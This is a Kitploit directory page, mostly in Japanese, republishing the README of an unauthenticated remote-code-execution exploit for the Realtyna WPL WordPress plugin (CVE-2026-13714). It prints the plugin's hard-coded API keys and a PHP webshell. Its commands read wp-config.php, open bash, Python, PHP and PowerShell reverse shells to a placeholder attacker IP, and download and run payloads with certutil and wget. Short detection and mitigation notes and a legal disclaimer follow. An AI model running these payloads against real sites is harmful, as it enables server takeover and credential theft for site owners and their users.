Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-13714 — Realtyna WPL < 5.3.0 向けの認証なし RCE エクスプロイト。ハードコードされた API キーを介して PHP ウェブシェルをアップロードし、任意のシステムコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/katransefa/cve-2026-13714
エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストペイロード開発
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Realtyna WPL < 5.3.0 向けの認証なし RCE エクスプロイト。ハードコードされた API キーを介して PHP ウェブシェルをアップロードし、任意のシステムコマンドを実行します。

リポジトリを見る
4日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Realtyna WPL < 5.3.0 - 認証なしRCEエクスプロイト

説明

このエクスプロイトは、Realtyna Organic IDX + WPL Real Estate プラグインのバージョン 5.3.0 未満に存在する重大な脆弱性を標的としています。このプラグインはハードコードされた認証情報を使用しており、認証なしのファイルアップロードを許可するため、リモートコード実行 (RCE) につながります。

脆弱性の詳細

  • CVE ID: CVE-2026-13714
  • 影響を受けるバージョン: < 5.3.0
  • タイプ: 認証なしの任意ファイルアップロードによるRCE
  • 研究者: Thom Stackhouse

技術的詳細

このプラグインには、デフォルトで有効なI/O APIがあり、ハードコードされた認証情報を使用しています:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

このAPIはファイルタイプを検証しないため、任意のPHPファイルのアップロードが可能です。

インストール

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

使用方法

基本的な使用方法

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

一般的なコマンド

Linuxターゲット

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Windowsターゲット

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

高度な使用方法

リバースシェル (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

リバースシェル (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

カスタムペイロードのアップロードと実行

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

エクスプロイトの流れ

  1. アップロード: PHPウェブシェル (<?php system($_GET['c']); ?>) をアップロードします
  2. 場所: ファイルは wp-content/uploads/WPL/<ID>/shell.php に保存されます
  3. 実行: shell.php?c=COMMAND を介してコマンドを実行します

検出

エクスプロイトを検出する方法

  • /wp-content/uploads/WPL/*/ に不審なファイルがないか確認する
  • パラメータ wplview=io, wplformat=io, cmd=set_property を含むリクエストを監視する
  • ハードコードされた認証情報を使った不審なAPIリクエストを探す

侵害の兆候

  • アップロードディレクトリ内の予期しないPHPファイル
  • システムコマンドを含む異常なWebリクエスト
  • WordPress内の新しい管理者ユーザー
  • 改変された .htaccess ファイル

緩和策

修正方法

  1. 直ちに更新する WPL Real Estate バージョン 5.3.0 以上へ
  2. 更新できない場合は、I/O APIを無効にします:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. ハードコードされた認証情報を変更する
  4. 適切なファイルタイプ検証を実装する
  5. ファイルアップロードディレクトリを制限する

セキュリティ推奨事項

  • すべてのWordPressプラグインを最新に保つ
  • Webアプリケーションファイアウォール (WAF) を使用する
  • 定期的なセキュリティ監査
  • ファイルアップロードディレクトリの監視
  • 不要なAPIを無効にする

スクリーンショット

エクスプロイト成功例

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

免責事項

このエクスプロイトは教育および正規のテスト目的のみを対象としています。所有していない、またはテスト許可を得ていないシステムに対する不正使用は違法です。作者は誤用に対する責任を負いません。

法的な使用

  • 自分が所有するシステムでのみ使用する
  • 明示的な書面による許可を得た場合のみ使用する
  • 責任ある開示の慣行に従う
  • 脆弱性をベンダーに報告する

ライセンス

このプロジェクトは教育目的のみです。自己責任で使用してください。

クレジット

  • 原作者: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

参考文献

  • WPScan脆弱性ページ
  • CVE-2026-13714

変更履歴

v1.0 (2026-08-17)

  • 初期リリース
  • 認証なしのファイルアップロード
  • リモートコード実行
  • コマンド実行サポート

貢献

改善のためのissueやpull requestを歓迎します。

サポート

問題や質問がある場合は、GitHubでissueを開いてください。


⚠️ 警告: このツールはセキュリティ研究および教育目的でのみ提供されています。システムをテストする前に必ず適切な許可を取得してください。

ツールをダウンロード